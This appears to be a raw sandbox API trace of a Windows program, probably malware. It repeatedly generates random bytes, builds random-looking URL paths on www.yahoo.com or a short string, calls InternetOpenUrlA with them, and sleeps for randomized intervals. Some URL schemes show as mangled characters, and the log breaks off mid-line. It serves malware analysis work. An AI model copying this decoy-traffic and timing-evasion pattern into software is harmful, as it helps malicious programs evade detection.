0x7ffc5bcc36b0 [0205.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0205.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4977, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d4977) returned 0x0 [0205.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0205.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0205.084] GetProcessHeap () returned 0x440000 [0205.084] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0205.085] lstrcpyA (in: lpString1=0x4726f0, lpString2="~çåès://www.yahoo.com" | out: lpString1="~çåès://www.yahoo.com") returned="~çåès://www.yahoo.com" [0205.085] lstrcatA (in: lpString1="~çåès://www.yahoo.com", lpString2="/bwqNn84QiBpag23Cz8x9oniA7za6t1Sxy1UyraqbZjb1/HmowTekjRDqJ6ymdy2h0FHo7/7mbCl9s15facBXyo5W1u95ldFfala8bvi5yhxsfmc22EilH/vmmsc8hbnzn8aZW5eyb3v/" | out: lpString1="~çåès://www.yahoo.com/bwqNn84QiBpag23Cz8x9oniA7za6t1Sxy1UyraqbZjb1/HmowTekjRDqJ6ymdy2h0FHo7/7mbCl9s15facBXyo5W1u95ldFfala8bvi5yhxsfmc22EilH/vmmsc8hbnzn8aZW5eyb3v/") returned="~çåès://www.yahoo.com/bwqNn84QiBpag23Cz8x9oniA7za6t1Sxy1UyraqbZjb1/HmowTekjRDqJ6ymdy2h0FHo7/7mbCl9s15facBXyo5W1u95ldFfala8bvi5yhxsfmc22EilH/vmmsc8hbnzn8aZW5eyb3v/" [0205.085] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0205.085] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="~çåès://www.yahoo.com/bwqNn84QiBpag23Cz8x9oniA7za6t1Sxy1UyraqbZjb1/HmowTekjRDqJ6ymdy2h0FHo7/7mbCl9s15facBXyo5W1u95ldFfala8bvi5yhxsfmc22EilH/vmmsc8hbnzn8aZW5eyb3v/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0205.086] GetProcessHeap () returned 0x440000 [0205.086] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0205.086] GetProcessHeap () returned 0x440000 [0205.086] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4900 | out: hHeap=0x440000) returned 1 [0205.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0205.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0205.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0205.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0205.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0205.087] Sleep (dwMilliseconds=0x1673a) [0206.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0206.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0206.153] GetProcessHeap () returned 0x440000 [0206.153] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0206.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0206.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0206.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0206.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.160] GetProcessHeap () returned 0x440000 [0206.160] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0206.161] lstrcpyA (in: lpString1=0x473da0, lpString2="0NO" | out: lpString1="0NO") returned="0NO" [0206.161] lstrcatA (in: lpString1="0NO", lpString2="/n8t8B1shgvywkanvE2ecrdCyfE6Krj8J0n/" | out: lpString1="0NO/n8t8B1shgvywkanvE2ecrdCyfE6Krj8J0n/") returned="0NO/n8t8B1shgvywkanvE2ecrdCyfE6Krj8J0n/" [0206.162] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0206.162] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="0NO/n8t8B1shgvywkanvE2ecrdCyfE6Krj8J0n/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0206.162] GetProcessHeap () returned 0x440000 [0206.162] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0206.162] GetProcessHeap () returned 0x440000 [0206.162] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0206.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0206.164] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0206.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0206.165] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0206.165] Sleep (dwMilliseconds=0x1cfa8) [0206.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0206.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0206.787] GetProcessHeap () returned 0x440000 [0206.787] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0206.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0206.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0206.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0206.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0206.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0206.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0206.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.104] GetProcAddress (hModule=0x7ffc5bcc0000, 